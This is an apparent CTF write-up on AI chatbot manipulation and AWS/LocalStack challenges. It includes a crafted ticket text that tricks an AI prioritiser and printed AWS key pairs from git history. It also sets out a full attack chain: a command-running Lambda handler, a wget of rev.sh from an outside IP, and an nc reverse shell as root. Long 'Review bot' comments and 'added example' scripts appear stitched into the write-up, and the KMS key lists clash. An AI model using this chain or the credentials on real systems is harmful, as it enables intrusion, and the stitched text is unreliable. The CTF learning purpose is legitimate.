xsspresso

Amazon CTF

Multi-challenge CTF covering AI chatbot prompt injection, LLM priority bypass, web vulnerabilities, and information disclosure across several themed web apps.

September 11, 2025
#AI #Prompt Injection #LLM #Web

re-recars ai

You have been tasked with pentesting the largest used car listing website in your area. They have recently implemented an AI chatbot in their listing page to help users with common questions. The website's policy is not to disclose the seller's information unless the user is logged in. Can you find a way to bypass the filters and reveal the seller's phone number by asking the chatbot? Flag format: HTB{xxx-xxxx-xxx}.

sh
HTB{555-1337-476}

AllSafe Tickets

The AllSafe Cybersecurity team is experiencing a surge in client ticket submissions. After repeated hacks on their client's systems, they've implemented a new AI ticket prioritization system to focus only on high-severity issues. The AI evaluates the ticket description and assigns a priority "High/Medium/Low" based on the severity of the issue. Can you trick the AI into prioritizing your ticket as "High"?

http
POST /api/submit HTTP/1.1
Host: 94.237.48.12:36399
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://94.237.48.12:36399/
Content-Type: application/json
Content-Length: 307
Origin: http://94.237.48.12:36399
DNT: 1
Connection: close
Priority: u=0
 
{"name":"test","email":"test@email.com","description":"server DB01 is completely unresponsive, preventing the accounting department (50+ users) from processing payroll. CPU usage is maxed out, and recent error logs show repeated segmentation fault crashes. Immediate attention required to avoid business-cr"}

sh
HTB{pr10r1t1z3d_t0_th3_h1gh_r04d_081f8096cf704a816ee21d3cba18ae39}

Call

Doctor Emmett Brown invented the DeLorean Web Machine to help Marty restore broken parts of websites. Help Marty discover them between the past and the future.

Leak

We're soon launching the most secure accounting service around the globe. Even before launch we got breached and our beta services were exposed. Can you help us identify them?

sh
commit e5cc56d5200ce2ace18aece1d5c35d1c2d7a7ef4 (HEAD -> master)
Author: noah <noah@cloud.htb>
Date:   Fri Jun 3 19:37:46 2022 +0000
 
    minor fixes
 
commit 9ca1b66d72f9619ce327f68c27e636c25f902a6f
Author: noah <noah@cloud.htb>
Date:   Wed May 25 12:02:43 2022 +0000
 
    adding endpoint url
 
commit bdecaa72f75b2b82b9e6296a625bc779b12fa92f
Author: noah <noah@cloud.htb>
Date:   Wed May 25 11:34:46 2022 +0000
 
    Update
 
commit 47cd4c6ca93667c00bbf54c0c44a356fde9b43ae
Author: noah <noah@cloud.htb>
Date:   Wed May 25 11:30:26 2022 +0000
 
    update
 
commit 409beac56d4d1aaea5d86ed4cdf7532df605b36a
Author: noah <noah@cloud.htb>
Date:   Wed May 25 11:29:58 2022 +0000
 
    minor fix
 
commit 4262e5a54872b02aa397f46a9dd539dbe761f594
Author: noah <noah@cloud.htb>
Date:   Wed May 25 11:28:44 2022 +0000
 
sh
commit 4262e5a54872b02aa397f46a9dd539dbe761f594
Author: noah <noah@cloud.htb>
Date:   Wed May 25 11:28:44 2022 +0000
 
    Adding initial code
 
diff --git a/.gitignore b/.gitignore
new file mode 100644
index 0000000..2d19fc7
--- /dev/null
+++ b/.gitignore
@@ -0,0 +1 @@
+*.html
diff --git a/create_function.py b/create_function.py
new file mode 100644
index 0000000..c449df5
--- /dev/null
+++ b/create_function.py
@@ -0,0 +1,26 @@
+import boto3
+
+iam_client = boto3.client('iam')
+lambda_client = boto3.client('lambda')
+
+with open('code.zip', 'rb') as f:
+       zipped_code = f.read()
+  
+role = iam_client.get_role(RoleName='LambdaBasicExecution')
+
+response = lambda_client.create_function(
+    FunctionName='accserv-dev',
+    Runtime='python3.8',
+    Role=role['Role']['Arn'],
+    Handler='lambda_function.lambda_handler',
+    Code=dict(ZipFile=zipped_code),
+    Timeout=300,
+    Environment={
+        'Variables': {
+            'Name': 'accserv-dev',
+            'Environment': 'dev'
+        }
+    },
+)
+
+print(response)
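Review bot: the role is resolved with `iam_client.get_role(RoleName='LambdaBasicExecution')` and `create_function` is called with no error handling, so the function lands in whatever account the default credential chain happens to resolve to, silently. Pass the role ARN explicitly (or assert on `role['Role']['Arn']`), catch `ResourceConflictException` so re-runs fail loudly, and pick a supported runtime: `python3.8` is past end of support for Lambda.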
 
sh
commit 409beac56d4d1aaea5d86ed4cdf7532df605b36a
Author: noah <noah@cloud.htb>
Date:   Wed May 25 11:29:58 2022 +0000
 
    minor fix
 
diff --git a/create_function.py b/create_function.py
index c449df5..9a44c6f 100644
--- a/create_function.py
+++ b/create_function.py
@@ -1,6 +1,6 @@
 import boto3
 
-iam_client = boto3.client('iam')
+iam_client = boto3.client('iam',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
 lambda_client = boto3.client('lambda')
 
 with open('code.zip', 'rb') as f:
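Review bot: this hunk hard-codes a live key pair (`aws_access_key_id='ASIACVH82GQZDCNK2X9B'`, `aws_secret_access_key='cnVpO1/...'`) into the client constructor. Moving it to environment variables two commits later does not help: the pair stays in history and comes back with a plain `git log -p`, so the key has to be rotated and the history rewritten or discarded. Leave the arguments out entirely and let boto3 use its credential chain, and run a secret scanner as a pre-commit hook.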
sh
commit 47cd4c6ca93667c00bbf54c0c44a356fde9b43ae
Author: noah <noah@cloud.htb>
Date:   Wed May 25 11:30:26 2022 +0000
 
    update
 
diff --git a/create_function.py b/create_function.py
index 9a44c6f..c4f7b7e 100644
--- a/create_function.py
+++ b/create_function.py
@@ -1,7 +1,7 @@
 import boto3
 
 iam_client = boto3.client('iam',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
-lambda_client = boto3.client('lambda')
+lambda_client = boto3.client('lambda',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
 
 with open('code.zip', 'rb') as f:
        zipped_code = f.read()
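Review bot: the same literal pair is now pasted a second time for the `lambda` client instead of being read once into a `boto3.Session` shared by both clients, which doubles the lines to scrub later. An `ASIA` key id is a temporary STS credential and also needs `aws_session_token`; against real AWS this call would be rejected as an invalid token.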
 
sh
commit bdecaa72f75b2b82b9e6296a625bc779b12fa92f
Author: noah <noah@cloud.htb>
Date:   Wed May 25 11:34:46 2022 +0000
 
    Update
 
diff --git a/create_function.py b/create_function.py
index c4f7b7e..c4212b9 100644
--- a/create_function.py
+++ b/create_function.py
@@ -1,7 +1,10 @@
+import os
 import boto3
 
-iam_client = boto3.client('iam',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
-lambda_client = boto3.client('lambda',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
+AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']
+AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
+iam_client = boto3.client('iam',aws_access_key_id=AWS_ACCESS_KEY_ID,aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
+lambda_client = boto3.client('lambda',aws_access_key_id=AWS_ACCESS_KEY_ID,aws_secret_access_key=AWS_SECRET_ACCESS_KEY))
 
 with open('code.zip', 'rb') as f:
        zipped_code = f.read()
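Review bot: `lambda_client = boto3.client(...aws_secret_access_key=AWS_SECRET_ACCESS_KEY))` has one `)` too many, so this revision does not parse; the next commit happens to drop it. Indexing `os.environ['AWS_ACCESS_KEY_ID']` also raises `KeyError` whenever the variable is unset, whereas omitting the arguments lets boto3 read the same variables, a profile, or an instance role on its own.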
 
sh
commit 9ca1b66d72f9619ce327f68c27e636c25f902a6f
Author: noah <noah@cloud.htb>
Date:   Wed May 25 12:02:43 2022 +0000
 
    adding endpoint url
 
diff --git a/create_function.py b/create_function.py
index c4212b9..8068a62 100644
--- a/create_function.py
+++ b/create_function.py
@@ -3,8 +3,18 @@ import boto3
 
 AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']
 AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
-iam_client = boto3.client('iam',aws_access_key_id=AWS_ACCESS_KEY_ID,aws_secret_access_key=AWS_SECRET_ACCESS_KEY)
-lambda_client = boto3.client('lambda',aws_access_key_id=AWS_ACCESS_KEY_ID,aws_secret_access_key=AWS_SECRET_ACCESS_KEY))
+iam_client = boto3.client(
+               'iam',
+               aws_access_key_id=AWS_ACCESS_KEY_ID,
+               aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
+               endpoint_url=http://cloud.htb
+               )
+lambda_client = boto3.client(
+               'lambda',
+               aws_access_key_id=AWS_ACCESS_KEY_ID,
+               aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
+               endpoint_url=http://cloud.htb
+               )
 
 with open('code.zip', 'rb') as f:
        zipped_code = f.read()
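Review bot: `endpoint_url=http://cloud.htb` is a bare URL, not a string, and is a `SyntaxError`; it needs quoting as `'http://cloud.htb'`. The endpoint is also plain HTTP, so the signed requests and the uploaded zip travel in the clear; acceptable for a local emulator, not for a shared host.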
 
sh
commit e5cc56d5200ce2ace18aece1d5c35d1c2d7a7ef4 (HEAD -> master)
Author: noah <noah@cloud.htb>
Date:   Fri Jun 3 19:37:46 2022 +0000
 
    minor fixes
 
diff --git a/create_function.py b/create_function.py
index 8068a62..5046d9a 100644
--- a/create_function.py
+++ b/create_function.py
@@ -7,13 +7,15 @@ iam_client = boto3.client(
                'iam',
                aws_access_key_id=AWS_ACCESS_KEY_ID,
                aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
-               endpoint_url=http://cloud.htb
+               endpoint_url=http://cloud.htb,
+               region_name='us-east-2'
                )
 lambda_client = boto3.client(
                'lambda',
                aws_access_key_id=AWS_ACCESS_KEY_ID,
                aws_secret_access_key=AWS_SECRET_ACCESS_KEY,
-               endpoint_url=http://cloud.htb
+               endpoint_url=http://cloud.htb,
+               region_name='us-east-2'
                )
 
 with open('code.zip', 'rb') as f:
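Review bot: the URL is still unquoted (`endpoint_url=http://cloud.htb,`), so "minor fixes" leaves the file unparseable. `region_name='us-east-2'` next to a fixed `endpoint_url` only changes the SigV4 signing region, not where the request goes; keep it if the emulator checks the region, otherwise it is noise. Since both clients share one endpoint, anyone holding the keys can reach the same `lambda` API with the CLI's `--endpoint-url`, which is exactly what the rest of the writeup does.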
 
Using the leaked key pair against the endpoint from the script confirms they are accepted:

sh
aws sts get-caller-identity --endpoint-url http://cloud.htb
{
    "UserId": "AKIAC4G4H8J2K9K1L0M2",
    "Account": "000000000000",
    "Arn": "arn:aws:iam::000000000000:user/noah"
}
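The key pair above was found by reading the diffs by hand; on a repository of any size this is what a secret scanner does. The following is an added example, not the writeup's tooling: it walks `git log -p` output, records every `+`/`-` line carrying an AWS access key id or secret, and reports the commit that introduced each value, the one that removed it, and whether HEAD still carries it. SAMPLE_LOG is constructed from the diff lines shown above (three of the commits, with Author and index lines omitted); the key patterns are the documented AWS formats.

```python
# Added example (not the writeup's tooling): walk `git log -p` output and report
# every AWS key pair ever committed, the commit that introduced it, the one that
# removed it, and whether HEAD still carries it. SAMPLE_LOG is constructed from
# the diff lines shown above (three of the commits, oldest first).
import re
from dataclasses import dataclass, field
from datetime import datetime, timezone
from typing import Dict, List, Optional, Set

# Access key ids: 20 chars with an AKIA (long-term) or ASIA (temporary STS)
# prefix. Secret keys: 40 chars of base64-style text; 40 hex chars are git
# object ids, not secrets, and are filtered out.
ACCESS_KEY_RE = re.compile(r"(?<![A-Z0-9])((?:AKIA|ASIA)[A-Z0-9]{16})(?![A-Z0-9])")
SECRET_KEY_RE = re.compile(r"(?<![A-Za-z0-9/+=])([A-Za-z0-9/+=]{40})(?![A-Za-z0-9/+=])")
SHA1_RE = re.compile(r"[0-9a-f]{40}")
COMMIT_RE = re.compile(r"^commit ([0-9a-f]{40})")
DATE_RE = re.compile(r"^Date:\s+(.+)$")
DATE_FMT = "%a %b %d %H:%M:%S %Y %z"           # git's default log date format
EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)


@dataclass
class Finding:
    kind: str                                   # "access_key" or "secret_key"
    value: str
    events: list = field(default_factory=list)  # (date, commit, '+' or '-', path)

    def added_in(self) -> Optional[str]:
        plus = sorted((e for e in self.events if e[2] == "+"), key=lambda e: e[:2])
        return plus[0][1] if plus else None

    def removed_in(self) -> Optional[str]:
        minus = sorted((e for e in self.events if e[2] == "-"), key=lambda e: e[:2])
        return minus[-1][1] if minus else None

    def still_present(self) -> bool:
        # Every "+" line adds a copy of the value and every "-" line drops one,
        # so a positive balance means the value is still in the tree at HEAD.
        return sum(1 if e[2] == "+" else -1 for e in self.events) > 0

    def files(self) -> Set[str]:
        return {e[3] for e in self.events if e[3]}


def scan_git_log(log: str) -> Dict[str, Finding]:
    """Parse `git log -p` text in any commit order; findings are indexed by value."""
    findings: Dict[str, Finding] = {}
    commit, date, path = None, EPOCH, None
    for line in log.splitlines():
        m = COMMIT_RE.match(line)
        if m:
            commit, date, path = m.group(1), EPOCH, None
            continue
        m = DATE_RE.match(line)
        if m:
            date = datetime.strptime(m.group(1).strip(), DATE_FMT)
            continue
        if line.startswith(("--- a/", "+++ b/")):
            path = line[6:]           # old path for removed lines, new path for added ones
            continue
        if line.startswith(("--- ", "+++ ")) or line[:1] not in ("+", "-"):
            continue                  # diff headers, hunk markers, context lines
        sign, body = line[0], line[1:]
        for kind, rx in (("access_key", ACCESS_KEY_RE), ("secret_key", SECRET_KEY_RE)):
            for value in rx.findall(body):
                if kind == "secret_key" and SHA1_RE.fullmatch(value):
                    continue
                findings.setdefault(value, Finding(kind, value)).events.append((date, commit, sign, path))
    return findings


def report(findings: Dict[str, Finding]) -> List[str]:
    """One line per finding, value truncated so the report itself is safe to paste around."""
    out = []
    for f in sorted(findings.values(), key=lambda f: (f.kind, f.value)):
        status = "STILL PRESENT at HEAD" if f.still_present() else f"removed in {(f.removed_in() or '?')[:7]}"
        out.append(f"{f.kind}: {f.value[:4]}...{f.value[-4:]} added in {(f.added_in() or '?')[:7]} "
                   f"({status}); files: {', '.join(sorted(f.files()))}")
    return out


# Constructed from the writeup's diffs; Author and index lines are omitted.
SAMPLE_LOG = """\
commit 409beac56d4d1aaea5d86ed4cdf7532df605b36a
Date:   Wed May 25 11:29:58 2022 +0000
diff --git a/create_function.py b/create_function.py
--- a/create_function.py
+++ b/create_function.py
-iam_client = boto3.client('iam')
+iam_client = boto3.client('iam',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
commit 47cd4c6ca93667c00bbf54c0c44a356fde9b43ae
Date:   Wed May 25 11:30:26 2022 +0000
diff --git a/create_function.py b/create_function.py
--- a/create_function.py
+++ b/create_function.py
-lambda_client = boto3.client('lambda')
+lambda_client = boto3.client('lambda',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
commit bdecaa72f75b2b82b9e6296a625bc779b12fa92f
Date:   Wed May 25 11:34:46 2022 +0000
diff --git a/create_function.py b/create_function.py
--- a/create_function.py
+++ b/create_function.py
-iam_client = boto3.client('iam',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
-lambda_client = boto3.client('lambda',aws_access_key_id='ASIACVH82GQZDCNK2X9B',aws_secret_access_key='cnVpO1/EjpR7pger+ELweFdbzKcyDe+5F3tbGOdn')
+AWS_ACCESS_KEY_ID = os.environ['AWS_ACCESS_KEY_ID']
+AWS_SECRET_ACCESS_KEY = os.environ['AWS_SECRET_ACCESS_KEY']
"""

if __name__ == "__main__":
    print("\n".join(report(scan_git_log(SAMPLE_LOG))))
```

Run it as `git log -p | python3 scan.py` style by replacing SAMPLE_LOG with `sys.stdin.read()`. Commit order does not matter because additions and removals are dated from the `Date:` header; a value whose balance is zero was removed, as here, but it is still in every clone's history, which is why the only remediation is rotation.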
sh
aws lambda get-function --function-name accserv-dev --endpoint-url http://cloud.htb
 
{
    "Configuration": {
        "FunctionName": "accserv-dev",
        "FunctionArn": "arn:aws:lambda:us-east-2:000000000000:function:accserv-dev",
        "Runtime": "python3.8",
        "Role": "arn:aws:iam::123456789012:role/service-role/accserv-dev-role",
        "Handler": "lambda_function.lambda_handler",
        "CodeSize": 316,
        "Description": "",
        "Timeout": 3,
        "LastModified": "2025-09-12T13:52:03.060+0000",
        "CodeSha256": "qT8cXI/juUJTkc9Wxsr9Vc7M7mt+kqxz3axqi/32Dhk=",
        "Version": "$LATEST",
        "VpcConfig": {},
        "TracingConfig": {
            "Mode": "PassThrough"
        },
        "RevisionId": "f068a66b-36e6-4df9-a1c5-a3ca0b557ff6",
        "State": "Active",
        "LastUpdateStatus": "Successful",
        "PackageType": "Zip"
    },
    "Code": {
        "Location": "http://127.0.0.1:4566/2015-03-31/functions/accserv-dev/code"
    },
    "Tags": {}
}
 
sh
aws lambda invoke --function-name accserv-dev --endpoint-url http://cloud.htb output.txt
 
{
    "StatusCode": 200,
    "LogResult": "",
    "ExecutedVersion": "$LATEST"
}
cat output.txt
{"body":"\"Still in development\"","statusCode":200}
 
Once the function code is replaced with the command-runner handler shown below, the same invoke call with a cmd payload executes commands as root. With AWS CLI v2 the raw JSON payload needs `--cli-binary-format raw-in-base64-out` (or `cli_binary_format = raw-in-base64-out` in the config file); CLI v1 takes it as-is:

sh
aws lambda invoke --function-name accserv-dev --payload '{"cmd": "whoami"}' --endpoint-url http://cloud.htb output.txt
{
    "StatusCode": 200,
    "LogResult": "",
    "ExecutedVersion": "$LATEST"
}
sh
cat output.txt
{"body":"{\"stdout\": \"root\\n\", \"stderr\": \"\", \"exit_code\": 0}","statusCode":200}
The replacement handler runs whatever arrives in the cmd field of the event and returns stdout, stderr and the exit code:

python
import json
import subprocess
 
def lambda_handler(event, context):
    cmd = event.get("cmd")
    if not cmd:
        return {
            "statusCode": 400,
            "body": json.dumps("Missing cmd")
        }
 
    p = subprocess.Popen(
        cmd,
        shell=True,
        stdout=subprocess.PIPE,
        stderr=subprocess.PIPE
    )
    stdout, stderr = p.communicate()
 
    return {
        "statusCode": 200,
        "body": json.dumps({
            "stdout": stdout.decode("utf-8"),
            "stderr": stderr.decode("utf-8"),
            "exit_code": p.returncode
        })
    }

Save it as lambda_function.py (the function's handler is lambda_function.lambda_handler), zip it as code.zip and push it over the existing code:

sh
zip code.zip lambda_function.py
sh
aws lambda update-function-code --function-name accserv-dev --zip-file fileb://code.zip --endpoint-url http://cloud.htb
sh
aws lambda invoke --function-name accserv-dev --payload '{"cmd": "wget http://10.10.14.44/rev.sh"}' --endpoint-url http://cloud.htb output.txt
sh
aws lambda invoke --function-name accserv-dev --payload '{"cmd": "chmod +x rev.sh"}' --endpoint-url http://cloud.htb output.txt
sh
aws lambda invoke --function-name accserv-dev --payload '{"cmd": "bash rev.sh"}' --endpoint-url http://cloud.htb output.txt
sh
rlwrap nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.44] from (UNKNOWN) [10.129.200.31] 38718
sh: can't access tty; job control turned off
/tmp/localstack/zipfile.73799837 # ls
index.html
lambda_function.py
original_lambda_archive.zip
rev.sh
/tmp/localstack/zipfile.73799837 # whoami
root
sh
/opt # ls
code
flag.txt
sh
/opt # cat flag.txt
HTB{Upd4t3s_4r3_n0t_n1c3_1n_l4mbd4s}

cue

sh
aws sts get-caller-identity --endpoint-url http://cloud.htb
{
    "UserId": "AKIAIOSFODNN7DXV3G29",
    "Account": "000000000000",
    "Arn": "arn:aws:iam::000000000000:user/will"
}
 
sh
aws dynamodb list-tables --endpoint-url http://cloud.htb
{
    "TableNames": [
        "users"
    ]
}
sh
aws dynamodb scan --table-name users --endpoint-url http://cloud.htb
 
{
    "Items": [
        {
            "password": {
                "S": "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"
            },
            "username": {
                "S": "wesley"
            }
        }
    ],
    "Count": 1,
    "ScannedCount": 1,
    "ConsumedCapacity": null
}
sh
echo -n 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 | base64 -d > ciphertext.bin
sh
-os.environ['AWS_ACCESS_KEY_ID'] = 'AKIA5M34BDN8GCJGRFFB'
-os.environ['AWS_SECRET_ACCESS_KEY'] = 'cLK3S3CNsXfj0mjPsIH2iCh5odYHMPDwSVxn7CB5'
sh
aws kms list-keys --endpoint-url http://cloud.htb --region us-east-1
{
    "Keys": [
        {
            "KeyId": "01b3d79d-9ea7-41a9-8c5f-db6149eb6b7e",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/01b3d79d-9ea7-41a9-8c5f-db6149eb6b7e"
        },
        {
            "KeyId": "36fbc89c-6400-4b7c-a18e-1da7eec68a8a",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/36fbc89c-6400-4b7c-a18e-1da7eec68a8a"
        },
        {
            "KeyId": "60529d79-c3ea-44fb-92d4-53aca4c52c2f",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/60529d79-c3ea-44fb-92d4-53aca4c52c2f"
        },
        {
            "KeyId": "61e74571-a6d7-4602-96d0-8f9d136df6e4",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/61e74571-a6d7-4602-96d0-8f9d136df6e4"
        },
        {
            "KeyId": "716c151a-4d72-46a4-aef9-b12664097cf9",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/716c151a-4d72-46a4-aef9-b12664097cf9"
        },
        {
            "KeyId": "7c479200-d49c-4f09-9689-a952489f62fa",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/7c479200-d49c-4f09-9689-a952489f62fa"
        },
        {
            "KeyId": "836a07d5-8d8b-48b0-8a9b-9e6f7b3af60d",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/836a07d5-8d8b-48b0-8a9b-9e6f7b3af60d"
        },
        {
            "KeyId": "b27135eb-3041-4d4d-ae05-7cdac8b04a01",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/b27135eb-3041-4d4d-ae05-7cdac8b04a01"
        },
        {
            "KeyId": "d40174d2-5442-4cd8-b115-2a3736ca597c",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/d40174d2-5442-4cd8-b115-2a3736ca597c"
        },
        {
            "KeyId": "ddb99800-4d53-456b-a983-8ad1b653d96e",
            "KeyArn": "arn:aws:kms:us-east-1:000000000000:key/ddb99800-4d53-456b-a983-8ad1b653d96e"
        }
    ]
}
sh
for key in \
01b3d79d-9ea7-41a9-8c5f-db6149eb6b7e \
36fbc89c-6400-4b7c-a18e-1da7eec68a8a \
60529d79-c3ea-44fb-92d4-53aca4c52c2f \
716c151a-4d72-46a4-aef9-b12664097cf9 \
7c479200-d49c-4f09-9689-a952489f62fa
do
    aws kms decrypt \
        --ciphertext-blob fileb://ciphertext.bin \
        --key-id $key \
        --endpoint-url http://cloud.htb \
        --region us-east-1 \
        --output text \
        --query Plaintext | base64 -d 2>/dev/null && echo "Decrypted with key $key" && break
done
 
An error occurred (InvalidCiphertextException) when calling the Decrypt operation: 
Decrypted with key 01b3d79d-9ea7-41a9-8c5f-db6149eb6b7e
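The loop reports `Decrypted with key 01b3d79d…` right after an `InvalidCiphertextException`, which is a false positive: `&&` tests the exit status of the last command in the pipeline, `base64 -d`, and that exits 0 on the empty stdout a failed `aws kms decrypt` leaves behind. Below is the same key-by-key attempt with the check done on the status of `aws` itself, as an added example rather than the writeup's script. The `aws` function at the top is a constructed stand-in so the script runs offline (one key id, 7c479200-…, is assumed to succeed); delete it to run against the real endpoint.

```shell
#!/bin/sh
# Added example: try a list of KMS key ids against one ciphertext and report
# the first that decrypts, judging success by the exit status of
# `aws kms decrypt` itself rather than of `base64 -d` at the end of a pipeline.

ENDPOINT="${ENDPOINT:-http://cloud.htb}"
REGION="${REGION:-us-east-1}"

# Constructed stand-in for the real CLI so this runs offline: exactly one
# assumed key id "decrypts"; every other id fails the way the real CLI does
# (error text on stderr, nothing on stdout, non-zero exit). Delete this
# function to run against a real endpoint.
aws() {
    k=""
    while [ $# -gt 0 ]; do
        case "$1" in --key-id) k="$2"; shift ;; esac
        shift
    done
    if [ "$k" = "7c479200-d49c-4f09-9689-a952489f62fa" ]; then
        printf 'HTB{stand-in}' | base64
        return 0
    fi
    echo "An error occurred (InvalidCiphertextException) when calling the Decrypt operation: " >&2
    return 254
}

# naive_find_decrypt_key CIPHER KEY...  -- the pattern from the writeup's loop.
# Without `set -o pipefail` the `&&` sees the status of `base64 -d`, which is
# 0 for empty input, so the very first key is reported whether it worked or not.
naive_find_decrypt_key() {
    cipher="$1"; shift
    for key in "$@"; do
        aws kms decrypt --ciphertext-blob "fileb://$cipher" --key-id "$key" \
            --endpoint-url "$ENDPOINT" --region "$REGION" \
            --output text --query Plaintext 2>/dev/null | base64 -d >/dev/null 2>&1 \
            && { printf '%s\n' "$key"; return 0; }
    done
    return 1
}

# kms_decrypt_with KEY CIPHER -- prints the plaintext; exit status is that of aws.
# Capturing stdout into a variable makes the status of `aws` itself the one
# tested, and a failed call (empty stdout) never reaches base64 at all.
kms_decrypt_with() {
    if out=$(aws kms decrypt --ciphertext-blob "fileb://$2" --key-id "$1" \
                 --endpoint-url "$ENDPOINT" --region "$REGION" \
                 --output text --query Plaintext 2>/dev/null); then
        printf '%s' "$out" | base64 -d
        return 0
    fi
    return 1
}

# find_decrypt_key CIPHER KEY... -- prints the first key id that decrypts, or
# returns 1 when none of them does.
find_decrypt_key() {
    cipher="$1"; shift
    for key in "$@"; do
        if kms_decrypt_with "$key" "$cipher" >/dev/null; then
            printf '%s\n' "$key"
            return 0
        fi
    done
    return 1
}

# Usage with the key ids from `aws kms list-keys` above (the stand-in ignores
# the ciphertext path):
#   find_decrypt_key ciphertext.bin 01b3d79d-9ea7-41a9-8c5f-db6149eb6b7e \
#       36fbc89c-6400-4b7c-a18e-1da7eec68a8a 7c479200-d49c-4f09-9689-a952489f62fa
```

In bash, `set -o pipefail` alone would also make the original one-liner honest, but that is a bashism; capturing the output and testing the assignment works in any POSIX sh. Against a real KMS a wrong key id produces the same `InvalidCiphertextException` as corrupted data, so a decrypt that fails for every key says nothing about whether the blob is a KMS ciphertext at all.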
 
 
An error occurred (501) when calling the ListGrants operation: Passed X-Amz-Target (TrentService.ListGrants) is not implemented
 
=== KEY d40174d2-5442-4cd8-b115-2a3736ca597c ===
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "d40174d2-5442-4cd8-b115-2a3736ca597c",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/d40174d2-5442-4cd8-b115-2a3736ca597c",
        "CreationDate": 1624355046,
        "Enabled": true,
        "Description": "test key 123",
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
        "EncryptionAlgorithms": [
            "SYMMETRIC_DEFAULT"
        ]
    }
}
--- policies ---
 
An error occurred (501) when calling the ListKeyPolicies operation: Passed X-Amz-Target (TrentService.ListKeyPolicies) is not implemented
{
    "Policy": "policy1"
}
--- grants ---
 
 
sh
for key_id in 120350aa-6b5a-4565-bfd2-020f410afe50 3849657b-3e11-4105-8eea-565e5113c444 43b5b1ea-9517-4c38-b399-c1be9a2458d2 7e70a32c-b383-4c59-be2c-2825ab25f7d3 94323941-4b22-4038-b9c3-4a9c072df027 aa0fa588-9739-4cf2-b822-506368268832 b2374455-700a-4945-94c8-59b92fcc746b cebde087-568f-49cc-b1ea-bb591bf1922c d40174d2-5442-4cd8-b115-2a3736ca597c e7c264a6-c849-40e2-9f46-70f54cfa4016; do
    echo "=== Describing Key: $key_id ==="
    aws kms describe-key --key-id $key_id --endpoint-url http://cloud.htb
    echo -e "\n"
done
=== Describing Key: 120350aa-6b5a-4565-bfd2-020f410afe50 ===
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "120350aa-6b5a-4565-bfd2-020f410afe50",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/120350aa-6b5a-4565-bfd2-020f410afe50",
        "CreationDate": 1757696308,
        "Enabled": true,
        "KeyUsage": "ENCRYPT_DECRYPT",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "SYMMETRIC_DEFAULT",
        "EncryptionAlgorithms": [
            "SYMMETRIC_DEFAULT"
        ]
    }
}
 
 
=== Describing Key: 3849657b-3e11-4105-8eea-565e5113c444 ===
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "3849657b-3e11-4105-8eea-565e5113c444",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/3849657b-3e11-4105-8eea-565e5113c444",
        "CreationDate": 1757696317,
        "Enabled": true,
        "KeyUsage": "SIGN_VERIFY",
        "KeyState": "Enabled",
        "Origin": "AWS_KMS",
        "KeyManager": "CUSTOMER",
        "CustomerMasterKeySpec": "RSA_4096",
        "SigningAlgorithms": [
            "RSASSA_PSS_SHA_256",
            "RSASSA_PSS_SHA_384",
            "RSASSA_PSS_SHA_512",
            "RSASSA_PKCS1_V1_5_SHA_256",
            "RSASSA_PKCS1_V1_5_SHA_384",
            "RSASSA_PKCS1_V1_5_SHA_512"
        ]
    }
}
 
 
=== Describing Key: 43b5b1ea-9517-4c38-b399-c1be9a2458d2 ===
{
    "KeyMetadata": {
        "AWSAccountId": "000000000000",
        "KeyId": "43b5b1ea-9517-4c38-b399-c1be9a2458d2",
        "Arn": "arn:aws:kms:us-east-1:000000000000:key/43b5b1ea-9517-4c38-b399-c1be9a2458d2",
